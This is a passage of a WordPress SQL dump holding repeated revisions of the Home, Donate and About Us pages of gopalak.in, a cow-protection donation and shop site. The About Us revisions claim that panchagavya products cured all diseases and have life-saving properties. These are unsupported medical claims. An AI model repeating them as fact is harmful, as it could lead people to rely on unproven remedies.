src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 16:26:46','2022-10-20 10:56:46','',1373,'https://gopalak.in/?p=1926',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1927,1,'2022-10-20 16:29:47','2022-10-20 10:59:47','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-768x768.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/GOPALAK-COIN-2.0-pwh7pivzzxoisxtaw3iodq3bqsq80x3rkk57uej99q.png 75w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0.png 1000w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 16:29:47','2022-10-20 10:59:47','',1816,'https://gopalak.in/?p=1927',0,'revision','',0),(1928,1,'2022-10-20 16:29:47','2022-10-20 10:59:47','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-768x768.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/GOPALAK-COIN-2.0-pwh7pivzzxoisxtaw3iodq3bqsq80x3rkk57uej99q.png 75w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0.png 1000w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 16:29:47','2022-10-20 10:59:47','',1816,'https://gopalak.in/?p=1928',0,'revision','',0),(1929,1,'2022-10-20 16:29:47','2022-10-20 10:59:47','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 16:29:47','2022-10-20 10:59:47','',1816,'https://gopalak.in/?p=1929',0,'revision','',0),(1930,1,'2022-10-20 16:33:18','2022-10-20 11:03:18','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-768x768.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/GOPALAK-COIN-2.0-pwh7pivzzxoisxtaw3iodq3bqsq80x3rkk57uej99q.png 75w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0.png 1000w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 16:33:18','2022-10-20 11:03:18','',1804,'https://gopalak.in/?p=1930',0,'revision','',0),(1931,1,'2022-10-20 16:33:18','2022-10-20 11:03:18','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-768x768.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/GOPALAK-COIN-2.0-pwh7pivzzxoisxtaw3iodq3bqsq80x3rkk57uej99q.png 75w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0.png 1000w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 16:33:18','2022-10-20 11:03:18','',1804,'https://gopalak.in/?p=1931',0,'revision','',0),(1932,1,'2022-10-20 16:33:18','2022-10-20 11:03:18','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, 